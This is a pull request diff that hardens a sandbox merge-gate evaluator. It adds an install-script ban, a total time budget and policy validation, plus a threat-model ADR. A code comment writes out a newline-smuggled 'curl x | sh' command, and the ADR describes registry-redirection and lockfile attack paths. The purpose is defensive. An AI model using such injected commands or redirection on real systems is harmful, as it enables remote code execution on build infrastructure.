### PR TITLE
Bound sandbox evaluation with a total budget and ignore install scripts

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -49,6 +49,26 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
   off the single unnamed key accounts were given before scoped tokens existed.
   Named tokens are unaffected. Move anything still using the legacy credential
   onto a named token first — disabling cannot be undone.
+- **A total time budget for sandbox evaluation** (`totalBudgetMs`, default 150s). The per-phase
+  timeouts were independent, so nothing bounded their sum and an evaluation could hold a
+  synchronous request open past any client or proxy deadline. Each phase is now granted
+  `min(configured, budget remaining)`, and exhausting the budget returns a failing verdict whose
+  reason names the phase (`sandbox budget exceeded (install)`) instead of hanging. See
+  [ADR 007](docs/adr/007-sandbox-evaluator-threat-model.md), which also documents what the
+  Cloudflare Sandbox binding is and is not relied upon to isolate.
+- `allowInstallScripts` on the `sandbox` evaluator config.
+
+### Breaking
+- **The sandbox evaluator no longer runs npm lifecycle scripts.** Dependency installs now pass
+  `--ignore-scripts`, because the evaluated tree is untrusted and a `preinstall`/`postinstall`
+  would otherwise execute before any human review. Projects whose build genuinely needs them
+  (native modules, a `prepare` step) opt back in with `allowInstallScripts: true` on the
+  `sandbox` evaluator in `.stratum/policy.yaml`. Note the usual symptom is *not* a failing
+  install: a native module installs unbuilt and then fails when the test command loads it.
+- **The default sandbox install timeout drops from 120s to 90s**, so the per-phase defaults sum
+  to exactly the new total budget and an unconfigured project is never truncated.
+- Re-evaluating an existing change (`POST /changes/:id/evaluate`) runs under the new default, so
+  a change that passed before this release may fail on re-evaluation.
 
 ### Fixed
 - Approvals are dismissed when the evaluated **base** moves, not only when the
@@ -105,6 +125,23 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
   takes the project id rather than its name, so a name-scoped lookup is not
   expressible at the call site, and `createWebhook` requires `projectId` so no
   new unstamped row can undo the backfill.
+- Policy files are now validated per evaluator, not just spread onto the defaults. `sandbox` and
+  `webhook` timeouts are clamped into range, `sandbox.command` is rejected if it is blank,
+  over-length, or contains a newline (which a shell would read as a second command), a `webhook`
+  entry without a `url` is dropped, and malformed `evaluators` entries are dropped instead of
+  crashing evaluator construction. An out-of-range value is clamped with a warning; it does not
+  block merges.
+- **`minScore` is clamped to `[0, 1]` and replaced when rejected.** Previously the raw value from
+  the policy file survived validation, so `minScore: -.inf` (or the string `"-5"`) made
+  `score >= minScore` true for every score — accepting changes whose evaluators had all scored 0.
+- A policy containing an unusable evaluator entry now fails the merge gate closed with a
+  `configError` rather than dropping that entry and proceeding on the survivors. Silently removing
+  one gate while its siblings remain would let a change through on the rest — a `webhook` whose
+  `url` was typo'd previously reached the evaluator and blocked. An unrecognised evaluator *type*
+  is unaffected; it is still passed through and rejected downstream.
+- A YAML alias cycle in a policy file no longer causes the whole file to be treated as absent.
+  Serializing a rejected entry for a log line could throw, and the fallback silently discarded the
+  file's `merge` protection — dropping `requiredApprovals` and re-enabling force-merge.
 - Sandbox evaluation of a pinned commit no longer clones a workspace's entire reachable
   history into memory: `readRepoFiles` now clones shallow and grows the fetch window only
   as far as needed to reach the pinned commit, capped at 500 commits, instead of an

--- a/docs/README.md
+++ b/docs/README.md
@@ -47,7 +47,8 @@ docs/
 │   ├── 003-d1-for-import-state.md
 │   ├── 004-high-frequency-agent-commits.md
 │   ├── 005-git-smart-http-proxy.md
-│   └── 006-ssh-transport.md
+│   ├── 006-ssh-transport.md
+│   └── 007-sandbox-evaluator-threat-model.md
 ├── research/                           # Research notes
 │   ├── github-alternatives-pain-points.md
 │   ├── master-plan-alignment.md
@@ -118,6 +119,7 @@ docs/
 - [ADR 004: High-Frequency Agent Commits to a Shared Repo](adr/004-high-frequency-agent-commits.md)
 - [ADR 005: Native `git push` via a Smart-HTTP Proxy](adr/005-git-smart-http-proxy.md)
 - [ADR 006: SSH Transport for Git](adr/006-ssh-transport.md)
+- [ADR 007: Sandbox Evaluator Threat Model and Time Budget](adr/007-sandbox-evaluator-threat-model.md)
 
 **Historical Reference:**
 - [Archived Documents](archive/README.md) - Code reviews, audits, etc.

--- a/docs/REMAINING_WORK.md
+++ b/docs/REMAINING_WORK.md
@@ -64,6 +64,12 @@ latency includes the full evaluator suite (LLM, sandbox). Moving evaluation to
 a queue-backed worker keeps change creation fast and allows retries; fine at
 current scale.
 
+The sandbox evaluator's share is now bounded by a total budget (`totalBudgetMs`,
+default 150s — see ADR 007), so it can no longer run for the unbounded sum of
+its per-phase timeouts. The `llm` evaluator still has no timeout at all, so
+overall evaluation latency remains unbounded; that, and moving the whole suite
+off the request path, are what this item still covers.
+
 ### Per-project team permission grants
 
 Team write/admin grants are org-wide. Per-project grants allow finer-grained

--- a/docs/adr/007-sandbox-evaluator-threat-model.md
+++ b/docs/adr/007-sandbox-evaluator-threat-model.md
@@ -1,0 +1,208 @@
+# ADR 007: Sandbox Evaluator Threat Model and Time Budget
+
+## Status
+
+Accepted. Implements the decisions in issue #239, which was filed because both
+items below needed a policy call rather than a quick fix.
+
+Note the ADR is written while the `[[sandboxes]]` binding is **commented out**
+in `wrangler.toml`. Nothing here has been verified empirically against a live
+Cloudflare Sandbox; the unknowns are labelled as such rather than resolved.
+
+## Context
+
+The `sandbox` evaluator (`src/evaluation/sandbox-evaluator.ts`) materializes the
+full workspace tree at the evaluated commit into a Cloudflare Sandbox, installs
+dependencies, and runs a configured command as a merge gate.
+
+**The evaluated tree is untrusted input.** It is authored by an agent, or by any
+human who can push to a workspace, and the evaluator runs against it *before*
+any human review — that is the entire point of a merge gate. Everything below
+follows from taking that seriously.
+
+Two specific problems prompted this ADR.
+
+**1. Nothing bounded total evaluation time.** `installTimeoutMs` and `timeoutMs`
+were independent per-phase timeouts. With the old defaults (120s + 60s) a single
+evaluation could occupy a synchronous request for 180s of sandbox work alone,
+before an unbounded repo tree read. Evaluation runs on the request path — from
+`POST /projects/:name/changes`, `POST /changes/:id/evaluate`, and the gated
+`git push` receive-pack handler — so a caller or proxy gives up first and the
+submitter never learns the verdict. Worse, both numbers came straight from
+`.stratum/policy.yaml` with no validation: `installTimeoutMs: 999999999` was
+accepted verbatim.
+
+**2. `npm ci`/`npm install` executed untrusted lifecycle scripts.** A tree's
+`package.json` can declare `preinstall`/`install`/`postinstall`. Those ran with
+whatever access the Sandbox binding permits, before review. The binding is the
+intended isolation boundary, but Stratum had never written down what that
+boundary is assumed to provide.
+
+## Decision
+
+### 1. Installs pass `--ignore-scripts` by default
+
+`installCommandFor` emits `--ignore-scripts` unless a project sets
+`allowInstallScripts: true` on its `sandbox` evaluator config. The parameter is
+optional and the safe behavior is the default, so omitting it cannot silently
+opt a project in.
+
+This is a **breaking change** for projects whose build needs lifecycle scripts.
+The opt-in exists precisely for them.
+
+### 2. A total budget bounds the evaluation
+
+`totalBudgetMs` (default 150 000 ms) bounds the whole evaluation. Each phase is
+granted `min(configured, budget remaining)`; exhaustion returns a verdict —
+score 0, reason `sandbox budget exceeded (<phase>)` — reached two ways: a phase
+that cannot be started, and a phase whose grant the budget had to shorten which
+then failed at that shortened timeout.
+
+A phase that hits the project's **own** configured timeout is deliberately not
+in scope: it keeps returning `err(ExternalServiceError)`, as it did before this
+change. Relabelling it would silently alter what every pre-existing sandbox
+timeout reports, and it is not the budget's judgement to make.
+
+Classification requires **both** that the budget shortened the grant and that
+the phase actually spent it. A transient Sandbox failure part-way through a
+budget-shortened phase stays an `err`, so a retryable infrastructure problem is
+never converted into a definitive judgement that fails the merge gate. Elapsed
+time is used for this rather than matching on error message text, which is
+binding-specific and would rot silently.
+
+The per-phase defaults were lowered so they sum to exactly the budget
+(`installTimeoutMs` 120s → **90s**, `timeoutMs` unchanged at 60s), enforced by a
+test. Without that, an unconfigured project's scored command would be truncated
+through no choice of its own.
+
+Exhaustion is a **verdict, not an error**. The sandbox was reachable and ran; it
+simply did not finish in the time a synchronous request can carry. That is a
+judgement about the change, whereas an unreachable sandbox is not.
+
+### 3. Policy-supplied values are validated and clamped
+
+`policy-loader.ts` clamps `sandbox.timeoutMs`, `sandbox.installTimeoutMs`,
+`sandbox.totalBudgetMs`, `webhook.timeoutMs`, and top-level `minScore`;
+validates `sandbox.command` (non-empty, no newlines, length-capped) and
+`sandbox.allowInstallScripts` (real boolean); and drops malformed evaluator
+entries that would otherwise crash `buildEvaluators` on `.type` access.
+
+A clamp is **not** a malformed policy: it logs a warning, sets no `configError`,
+and blocks no merge. `configError` is for a policy that could not be understood
+at all; an out-of-range timeout is a bounded mistake that is safe to correct,
+and escalating it to a merge block would be hostile to existing projects.
+
+Load-time clamping is defense in depth, not the boundary. `evaluate()` is also
+reachable from a 60-second KV policy cache and from callers that never went
+through the loader, so the evaluator applies its own defaults and
+`budget.allow()` regardless. This matches the existing point-of-use precedent in
+`llm-evaluator.ts`.
+
+## What the Sandbox binding is relied upon for
+
+**Relied upon:** process and filesystem isolation per sandbox instance, and that
+an instance is destroyed after each evaluation (`sb.destroy()` in a `finally`).
+Stratum does not inject bindings, secrets, or tokens into the sandbox — the
+evaluator writes only the repo tree and its own decode helpers.
+
+**Not relied upon, because Cloudflare does not publicly document it and we
+cannot verify it here:**
+
+- **Network egress restrictions.** We assume egress **is** available. That
+  conservative assumption is what motivates `--ignore-scripts`.
+- **Whether `run()`'s `timeout` actually terminates the process** or is merely
+  advisory. If advisory, a single runaway command is not interrupted; the budget
+  still prevents *subsequent* phases from starting.
+- Any guarantee about filesystem scoping beyond the instance.
+
+Anyone enabling the `[[sandboxes]]` binding should verify these rather than
+inherit the assumptions in this document.
+
+## What `--ignore-scripts` does not close
+
+It narrows the window from "arbitrary code, during install, before review" to
+"the command the project explicitly configured". It is **not** containment. Still
+open at install time:
+
+- **A tree-supplied `.npmrc`.** npm honors one checked into the repo:
+  `registry=`, `//host/:_authToken=`, proxy settings. Combined with the
+  assumption that egress is available, a hostile tree can redirect dependency
+  resolution to an attacker host with no lifecycle script involved.
+- **Lockfile `resolved` URLs.** `package-lock.json` is attacker-authored and
+  `npm ci` fetches those URLs verbatim.
+- **The scored command itself.** `npm test` runs untrusted code by design. That
+  is what the evaluator is for, and why the Sandbox binding — not
+  `--ignore-scripts` — has to be the real boundary.
+
+**The mitigation is npm-only.** `installCommandFor` returns `null` without a
+`package.json`, so pnpm/yarn/bun trees get no install at all and then run the
+scored command against an empty `node_modules`. This ADR does not bless that
+behavior; it records it.
+
+## The post-merge smoke check is a separate, worse exposure
+
+`src/merge/post-merge.ts` runs `MergePolicy.postMergeCommand` in a sandbox
+against the merged HEAD. It shares `materializeTree` with the evaluator but not
+`installCommandFor`, so `--ignore-scripts` does not reach it. It is out of scope
+for the code change this ADR accompanies, but it must be named, because it is
+strictly more exposed than the path that was fixed:
+
+- It mints a **write-scoped** repo token and runs untrusted merged code in the
+  same request.
+- It passes an **unbounded** `postMergeTimeoutMs` as the tree-decode timeout —
+  `sanitizeMergePolicy` requires it to be positive but places no ceiling.
+- It runs its command with **no dependency install at all**, so `npm test` there
+  executes against a tree with no `node_modules`.
+
+These should be addressed as follow-up work.
+
+## Residual risks accepted
+
+- **The budget does not bound Worker-side CPU.** Workers freeze `Date.now()`
+  across pure-CPU spans (see `src/utils/phase-timer.ts`), so a tree engineered to
+  burn CPU in pack decompression or base64 encoding advances the clock little.
+  Such work is constrained by workerd's own CPU limit, not by this budget. The
+  budget reliably bounds time spent *awaiting the sandbox*, which is the overrun
+  #239 was filed about.
+- **It is not a request-level bound.** The policy load and the two diff clones
+  happen before evaluation starts; `sandbox.create()` and `sb.destroy()` take no
+  timeout; and the `llm` evaluator has no timeout at all. Overall request latency
+  remains unbounded.
+- **Per-change budgeting is not rate limiting.** 150s of sandbox time per change,
+  times N concurrent gated pushes, is still available to a hostile pusher. The
+  `sandbox_ms` cost record is what surfaces this today.
+- **`requireAll: false` absorbs a budget verdict.** `CompositeEvaluator.aggregate`
+  then uses `some()` and `max()`, so a passing evaluator masks the sandbox's
+  failure. That is the documented meaning of the setting and a project owner's
+  choice, but it means "the sandbox fails closed" is true of the evaluator, not
+  unconditionally of the gate.
+- **Policy sanitization is still partial.** `requireAll`, `llm.threshold`, and
+  `diff.forbiddenPatterns` remain unvalidated.
+
+## Why `allowInstallScripts` needs no further ceremony
+
+`.stratum/policy.yaml` is in `PROTECTED_CONFIG_FILES`, so a change that flips
+the flag already requires a human approval and cannot be force-merged. That
+protection is what makes the opt-in safe to offer.
+
+It is worth recording its actual shape: `diffTouchesProtectedConfig` is a
+substring match for `diff --git a/.stratum/policy.yaml b/.stratum/policy.yaml`.
+A rename, non-default diff prefixes, or a path requiring git quoting would
+defeat it. Hardening that check is separate work; this ADR leans on the
+protection while naming its limit rather than assuming it is airtight.
+
+## Alternatives considered
+
+**Move evaluation off the request path** (issue #239's other option). A queue
+binding, a consumer, a new `evaluating` change status, a migration, and a rework
+of how the gated `git push` handler reports per-ref status. Deferred — tracked
+in `docs/REMAINING_WORK.md`. The budget remains correct and useful inside a
+future queue consumer, so this is not throwaway work.
+
+**Race the tree read against the budget.** Rejected: it needs a real timer,
+which an injected fake clock cannot drive, and leaks a live 150s timer into the
+test event loop. The read is instead charged against the budget without being
+interrupted.
+
+**Treat a clamp as `configError`.** Rejected as hostile to existing projects;
+see Decision 3.

--- a/docs/developer/architecture.md
+++ b/docs/developer/architecture.md
@@ -330,10 +330,34 @@ evaluators:
   - type: sandbox
     command: "npm test"        # default
     timeoutMs: 60000           # command timeout (default 60s)
-    installTimeoutMs: 120000   # dependency install timeout (default 120s)
+    installTimeoutMs: 90000    # dependency install timeout (default 90s)
+    totalBudgetMs: 150000      # whole-evaluation budget (default 150s)
+    allowInstallScripts: false # run npm lifecycle scripts (default false)
 # Pass/fail is decided by the policy-level `minScore` and `requireAll` fields,
 # not by a per-evaluator `required` flag.
 ```
+
+**Total budget:** the per-phase timeouts are independent, so nothing used to
+bound their sum — with the old defaults a single evaluation could occupy the
+request for 180s before the tree read was even counted. `totalBudgetMs` bounds
+the whole evaluation: each phase is granted `min(configured, budget remaining)`,
+and running out returns a *verdict* (score 0, reason
+`sandbox budget exceeded (<phase>)`) rather than hanging or erroring. The
+defaults are chosen to sum exactly to the budget, so an unconfigured project is
+never truncated.
+
+The budget bounds time spent awaiting the sandbox — the install and the scored
+command — which is what the per-phase timeouts failed to cap. It does **not**
+bound CPU-bound work inside the Worker (pack decompression, base64-encoding a
+large tree): Workers freeze `Date.now()` across pure-CPU spans (see
+`src/utils/phase-timer.ts`), so that work is constrained by workerd's own CPU
+limit instead. It is also not a request-level bound — the policy load and diff
+clones happen before evaluation starts. See
+`docs/adr/007-sandbox-evaluator-threat-model.md`.
+
+**Lifecycle scripts:** installs pass `--ignore-scripts` unless a project sets
+`allowInstallScripts: true`. The evaluated tree is untrusted, and a
+`postinstall` would otherwise execute before any human review.
 
 **Fail-closed when unavailable:** the `[[sandboxes]]` binding is commented out
 in `wrangler.toml` (beta feature; enabling it is an ops decision). While it is

--- a/docs/user-guide/ci-integration.md
+++ b/docs/user-guide/ci-integration.md
@@ -18,9 +18,37 @@ the **full workspace tree at the evaluated commit** — the same tree the merge
 would land — into a fresh Cloudflare Sandbox and runs a command there (default
 `npm test`, default timeout 60s, configurable via `command` and `timeoutMs`).
 If the tree carries a `package.json` it installs first, using `npm ci` when a
-lockfile is present and `npm install` otherwise. Exit code 0 scores 1.0;
-otherwise the test output is parsed for `N passed / M failed` counts to derive
-a partial score.
+lockfile is present and `npm install` otherwise, and passing `--ignore-scripts`
+unless the policy opts in (see below). Exit code 0 scores 1.0; otherwise the
+test output is parsed for `N passed / M failed` counts to derive a partial
+score.
+
+**npm lifecycle scripts are disabled by default.** The evaluated tree is
+authored by an agent or by anyone who can push to the workspace, so its
+`package.json` could declare `preinstall`/`install`/`postinstall` — which would
+run before any human has reviewed the change. Installs therefore pass
+`--ignore-scripts`. If your build genuinely needs them (native modules, a
+`prepare` step), opt back in:
+
+```yaml
+evaluators:
+  - type: sandbox
+    allowInstallScripts: true
+```
+
+Note that a native module will usually *install* fine with scripts ignored and
+then fail later, when the test command tries to load the unbuilt binary — so an
+opaque `.node` load error in your suite is the symptom to look for. Because
+`.stratum/policy.yaml` is a protected config file, flipping this flag requires
+a human approval and cannot be force-merged.
+
+**Every evaluation has a total time budget** (`totalBudgetMs`, default 150s)
+covering the tree read, dependency install, and the command. Each phase is
+granted whatever is left, and exhausting the budget returns a failing verdict
+whose reason names the phase — `sandbox budget exceeded (install)` — rather
+than hanging until your client times out. The per-phase defaults (90s install,
+60s command) sum to exactly the budget, so you only encounter it if you have
+raised a timeout or your repo is genuinely slower than the budget allows.
 
 It **requires the optional `SANDBOX` binding**. If a policy names a `sandbox`
 evaluator and the binding is absent, the evaluator does not silently

--- a/src/evaluation/limits.ts
+++ b/src/evaluation/limits.ts
@@ -1,0 +1,57 @@
+/**
+ * Time limits for the sandbox evaluator, shared by the evaluator itself and by
+ * the policy loader that clamps user-supplied values.
+ *
+ * They live in their own module because the two consumers sit on opposite sides
+ * of a dependency edge: `policy-loader` importing them from `sandbox-evaluator`
+ * would make a config loader depend on an evaluator implementation.
+ */
+
+/** Timeout for the scored command when a policy does not set one. */
+export const DEFAULT_TIMEOUT_MS = 60_000;
+
+/**
+ * Timeout for dependency install (and for the in-sandbox binary decode step)
+ * when a policy does not set one.
+ *
+ * Lowered from 120s so the two per-phase defaults sum to exactly
+ * `DEFAULT_TOTAL_BUDGET_MS`. At 120s an unconfigured project could have its
+ * scored command truncated by the budget through no choice of its own, which
+ * would make truncation the norm rather than the exception.
+ */
+export const DEFAULT_INSTALL_TIMEOUT_MS = 90_000;
+
+/**
+ * Total wall-clock a single sandbox evaluation may spend before it fails
+ * closed, covering the tree read, materialization, install, and the scored
+ * command.
+ *
+ * Chosen to sit under a 180s-class proxy deadline with headroom. It is a
+ * judgement, not a measurement: this repo configures no request timeout
+ * (`wrangler.toml` has no `[limits]` block) and the real ceiling is workerd's
+ * own request duration limit.
+ */
+export const DEFAULT_TOTAL_BUDGET_MS = 150_000;
+
+/** The scored command when a policy does not set one. */
+export const DEFAULT_COMMAND = "npm test";
+
+/** Floor for any per-phase timeout a policy may request. */
+export const MIN_PHASE_TIMEOUT_MS = 1_000;
+
+/**
+ * Ceiling for any per-phase timeout a policy may request.
+ *
+ * Deliberately below `MAX_TOTAL_BUDGET_MS` so no single phase can claim an
+ * entire evaluation's budget by configuration alone.
+ */
+export const MAX_PHASE_TIMEOUT_MS = 120_000;
+
+/** Floor for a policy-supplied total budget. */
+export const MIN_TOTAL_BUDGET_MS = 5_000;
+
+/** Ceiling for a policy-supplied total budget. */
+export const MAX_TOTAL_BUDGET_MS = 150_000;
+
+/** Longest `command` string a policy may supply, to bound what gets executed and logged. */
+export const MAX_COMMAND_LENGTH = 500;

--- a/src/evaluation/policy-loader.ts
+++ b/src/evaluation/policy-loader.ts
@@ -1,7 +1,14 @@
 import YAML from "yaml";
 import { readFileFromRepo } from "../storage/git-ops";
 import type { Logger } from "../utils/logger";
-import type { EvalPolicy, MergePolicy } from "./types";
+import {
+  MAX_COMMAND_LENGTH,
+  MAX_PHASE_TIMEOUT_MS,
+  MAX_TOTAL_BUDGET_MS,
+  MIN_PHASE_TIMEOUT_MS,
+  MIN_TOTAL_BUDGET_MS,
+} from "./limits";
+import type { EvalPolicy, EvaluatorConfig, MergePolicy, SandboxEvaluatorConfig } from "./types";
 
 const DEFAULT_POLICY: EvalPolicy = {
   evaluators: [{ type: "diff" }],
@@ -104,26 +111,298 @@ async function readAndParsePolicy(
       return { status: "malformed", reason: "missing or non-array 'evaluators'" };
     }
 
-    const merge = sanitizeMergePolicy((parsed as Record<string, unknown>).merge);
-    const {
-      merge: _unsanitized,
-      configError: _ce,
-      ...policy
-    } = {
-      ...DEFAULT_POLICY,
-      ...(parsed as Partial<EvalPolicy>),
-    };
-    return { status: "ok", policy: merge ? { ...policy, merge } : policy };
+    const raw = parsed as Record<string, unknown>;
+
+    // Sanitization gets its own catch. A throw in here is a statement about
+    // *this file* — a YAML alias cycle, say — not a transient read blip, and
+    // the outer handler's "treat as absent" would fall back to the permissive
+    // default with no `configError`, silently discarding the file's merge
+    // protection. Fail closed instead.
+    try {
+      const merge = sanitizeMergePolicy(raw.merge);
+      const {
+        merge: _unsanitized,
+        configError: _ce,
+        ...policy
+      } = {
+        ...DEFAULT_POLICY,
+        ...(parsed as Partial<EvalPolicy>),
+      };
+
+      // Rebuilt rather than taken from the spread: every entry must be a fresh
+      // object owned by this policy, so nothing downstream can reach back into
+      // the parsed input (or, via `DEFAULT_POLICY`'s own array, into the module
+      // default) by mutating what it was handed.
+      const declared = raw.evaluators as unknown[];
+      const evaluators = declared
+        .map((entry) => sanitizeEvaluator(entry, logger))
+        .filter((entry): entry is EvaluatorConfig => entry !== null);
+
+      // Any dropped entry fails the gate closed — not just the case where every
+      // entry was dropped. An entry the author wrote is a gate they meant to
+      // have; silently discarding one while its siblings survive removes that
+      // gate and lets the change through on the remaining ones, which is the
+      // permissive fallback `malformedPolicy` exists to prevent. A `webhook`
+      // whose `url` was typo'd is the concrete case: it used to reach
+      // `WebhookEvaluator` and block on an unusable URL.
+      //
+      // Note this only counts entries that are structurally unusable. An
+      // unrecognised `type` is copied through and rejected downstream by
+      // `buildEvaluators`, so a policy naming a future evaluator type does not
+      // trip this.
+      if (evaluators.length < declared.length) {
+        return {
+          status: "malformed",
+          reason: `${declared.length - evaluators.length} unusable entr${
+            declared.length - evaluators.length === 1 ? "y" : "ies"
+          } in 'evaluators'`,
+        };
+      }
+      policy.evaluators = evaluators;
+
+      // Assigned unconditionally: the spread above already put the *raw* value
+      // in `policy.minScore`, so skipping the assignment on rejection would
+      // leave it there — and `-Infinity` or the string "-5" both make
+      // `score >= minScore` true for every score, disabling the gate.
+      policy.minScore = clampScore(raw.minScore, logger) ?? DEFAULT_POLICY.minScore;
+
+      return { status: "ok", policy: merge ? { ...policy, merge } : policy };
+    } catch (e) {
+      const reason = e instanceof Error ? e.message : String(e);
+      logger.error("Policy sanitization threw — failing merge gate closed", undefined, {
+        path,
+        reason,
+      });
+      return { status: "malformed", reason };
+    }
   } catch (e) {
-    // Typically a transient repo-read blip — treat as absent so it doesn't block
-    // every merge. Log it: this also catches an unexpected throw from validation/
-    // sanitization, which would otherwise silently downgrade to the default policy.
+    // A transient repo-read blip — treat as absent so it doesn't block every
+    // merge. Sanitization failures no longer reach here; they are handled above
+    // and fail closed.
     logger.warn("Policy load failed; treating as absent", {
       path,
       error: e instanceof Error ? e.message : String(e),
     });
     return { status: "absent" };
   }
+}
+
+/** Longest attacker-supplied value echoed into a log line. */
+const MAX_LOGGED_VALUE_LENGTH = 100;
+
+/**
+ * Render a rejected value for a log line without letting it set the log's size.
+ *
+ * `JSON.stringify` throws on a circular structure, and a YAML alias cycle
+ * (`evaluators: &e [*e]`) produces one from a perfectly well-formed file — so
+ * this must not be the thing that decides whether a policy loads.
+ */
+function forLog(value: unknown): string {
+  let rendered: string;
+  try {
+    rendered = typeof value === "string" ? (value ?? "") : (JSON.stringify(value) ?? String(value));
+  } catch {
+    rendered = Object.prototype.toString.call(value);
+  }
+  return rendered.slice(0, MAX_LOGGED_VALUE_LENGTH);
+}
+
+/**
+ * Clamp a policy-supplied duration into range, or drop it so the caller's
+ * default applies.
+ *
+ * A clamp is deliberately *not* a malformed policy: it sets no `configError`
+ * and blocks no merge. `configError` exists for a policy that could not be
+ * understood at all; an out-of-range timeout is a bounded mistake that is safe
+ * to correct, and escalating it to a merge block would be hostile to projects
+ * that already have one.
+ */
+function clampDuration(
+  raw: unknown,
+  bounds: { min: number; max: number },
+  field: string,
+  logger: Logger,
+): number | undefined {
+  if (typeof raw !== "number" || !Number.isFinite(raw)) {
+    // NaN and ±Infinity are `typeof "number"`, so "non-numeric" would misdirect
+    // an operator debugging `totalBudgetMs: .inf`; include the value they wrote.
+    if (raw !== undefined) {
+      logger.warn("Ignoring policy field that is not a finite number", {
+        field,
+        submitted: forLog(raw),
+      });
+    }
+    return undefined;
+  }
+  const clamped = Math.min(bounds.max, Math.max(bounds.min, raw));
+  if (clamped !== raw) {
+    logger.warn("Clamped out-of-range policy field", {
+      field,
+      submitted: forLog(raw),
+      applied: clamped,
+    });
+  }
+  return clamped;
+}
+
+/**
+ * Clamp the aggregate pass threshold into `[0, 1]`, or drop it so the default
+ * applies. A score outside that range would make every change pass (or none),
+ * silently disabling the gate the policy exists to enforce.
+ */
+function clampScore(raw: unknown, logger: Logger): number | undefined {
+  if (typeof raw !== "number" || !Number.isFinite(raw)) {
+    if (raw !== undefined) {
+      logger.warn("Ignoring policy field that is not a finite number", {
+        field: "minScore",
+        submitted: forLog(raw),
+      });
+    }
+    return undefined;
+  }
+  const clamped = Math.min(1, Math.max(0, raw));
+  if (clamped !== raw) {
+    logger.warn("Clamped out-of-range policy field", {
+      field: "minScore",
+      submitted: forLog(raw),
+      applied: clamped,
+    });
+  }
+  return clamped;
+}
+
+/** Fields a `sandbox` evaluator entry may carry; anything else is a typo worth flagging. */
+const SANDBOX_CONFIG_KEYS = new Set([
+  "type",
+  "command",
+  "timeoutMs",
+  "installTimeoutMs",
+  "totalBudgetMs",
+  "allowInstallScripts",
+]);
+
+/**
+ * Keep only well-typed fields from a user-supplied `sandbox` evaluator entry.
+ *
+ * Always returns a fresh object rather than clamping the parsed entry in place,
+ * so the returned policy shares no object identity with the parsed input and
+ * nothing downstream can reach back into it.
+ */
+function sanitizeSandboxConfig(
+  source: Record<string, unknown>,
+  logger: Logger,
+): SandboxEvaluatorConfig {
+  const config: SandboxEvaluatorConfig = { type: "sandbox" };
+
+  // Because this rebuilds a whitelisted object, an unrecognised key would
+  // otherwise vanish in silence — and `timeout` for `timeoutMs` is the exact
+  // typo a project owner is most likely to make and least likely to notice.
+  for (const key of Object.keys(source)) {
+    if (!SANDBOX_CONFIG_KEYS.has(key)) {
+      logger.warn("Ignoring unrecognized sandbox evaluator field", { field: key });
+    }
+  }
+
+  // Rejecting newlines is load-bearing, not tidiness: "npm test\ncurl x | sh"
+  // is one string to a naive check and two commands to a shell.
+  if (typeof source.command === "string") {
+    const command = source.command.trim();
+    if (command && command.length <= MAX_COMMAND_LENGTH && !/[\r\n]/.test(command)) {
+      config.command = command;
+    } else {
+      logger.warn("Ignoring invalid sandbox command", { submitted: forLog(source.command) });
+    }
+  } else if (source.command !== undefined) {
+    logger.warn("Ignoring non-string sandbox command", { submitted: forLog(source.command) });
+  }
+
+  const phaseBounds = { min: MIN_PHASE_TIMEOUT_MS, max: MAX_PHASE_TIMEOUT_MS };
+  const timeoutMs = clampDuration(source.timeoutMs, phaseBounds, "sandbox.timeoutMs", logger);
+  if (timeoutMs !== undefined) config.timeoutMs = timeoutMs;
+
+  const installTimeoutMs = clampDuration(
+    source.installTimeoutMs,
+    phaseBounds,
+    "sandbox.installTimeoutMs",
+    logger,
+  );
+  if (installTimeoutMs !== undefined) config.installTimeoutMs = installTimeoutMs;
+
+  const totalBudgetMs = clampDuration(
+    source.totalBudgetMs,
+    { min: MIN_TOTAL_BUDGET_MS, max: MAX_TOTAL_BUDGET_MS },
+    "sandbox.totalBudgetMs",
+    logger,
+  );
+  if (totalBudgetMs !== undefined) config.totalBudgetMs = totalBudgetMs;
+
+  if (typeof source.allowInstallScripts === "boolean") {
+    config.allowInstallScripts = source.allowInstallScripts;
+  } else if (source.allowInstallScripts !== undefined) {
+    logger.warn("Ignoring non-boolean sandbox.allowInstallScripts", {
+      submitted: forLog(source.allowInstallScripts),
+    });
+  }
+
+  return config;
+}
+
+/**
+ * Validate one entry of the user-supplied `evaluators` array.
+ *
+ * Returns null for anything that is not an object with a string `type`. The
+ * array guard in `readAndParsePolicy` only checks `Array.isArray`, so entries
+ * like `null` or `"sandbox"` reach `buildEvaluators` and throw on `.type`
+ * access — dropping them here is what keeps a typo in a policy file from
+ * crashing every change on the project.
+ *
+ * Entries whose `type` this function does not clamp are copied through, not
+ * passed through by reference, so a returned policy never shares object
+ * identity with the parsed input or with `DEFAULT_POLICY`.
+ */
+function sanitizeEvaluator(raw: unknown, logger: Logger): EvaluatorConfig | null {
+  if (typeof raw !== "object" || raw === null || Array.isArray(raw)) {
+    logger.warn("Dropping non-object evaluator entry", { submitted: forLog(raw) });
+    return null;
+  }
+  const source = raw as Record<string, unknown>;
+  if (typeof source.type !== "string") {
+    logger.warn("Dropping evaluator entry without a string type", { submitted: forLog(raw) });
+    return null;
+  }
+
+  if (source.type === "sandbox") return sanitizeSandboxConfig(source, logger);
+
+  if (source.type === "webhook") {
+    // `url` is required by the type, so check it rather than asserting it. The
+    // evaluator does fail closed on a missing URL, but telling the compiler a
+    // value is a `webhook` config when it may have no `url` is exactly the kind
+    // of false claim the no-`any` rule exists to prevent.
+    if (typeof source.url !== "string") {
+      logger.warn("Dropping webhook evaluator entry without a url", {
+        submitted: forLog(raw),
+      });
+      return null;
+    }
+    // The same unbounded-timeout defect the sandbox entry had, one array
+    // element over: `webhook-evaluator` reads this straight from policy.
+    const timeoutMs = clampDuration(
+      source.timeoutMs,
+      { min: MIN_PHASE_TIMEOUT_MS, max: MAX_PHASE_TIMEOUT_MS },
+      "webhook.timeoutMs",
+      logger,
+    );
+    const webhook: EvaluatorConfig = { type: "webhook", url: source.url };
+    if (typeof source.secret === "string") webhook.secret = source.secret;
+    if (timeoutMs !== undefined) webhook.timeoutMs = timeoutMs;
+    return webhook;
+  }
+
+  // Evaluator types this function does not model are copied through so a new
+  // type is not silently dropped before `buildEvaluators` can reject it. The
+  // assertion is narrower than it looks — `type` is known to be a string, and
+  // an unknown one is discarded there with a warning.
+  return { ...source } as EvaluatorConfig;
 }
 
 /** Keep only well-typed merge-protection fields from user-supplied config. */

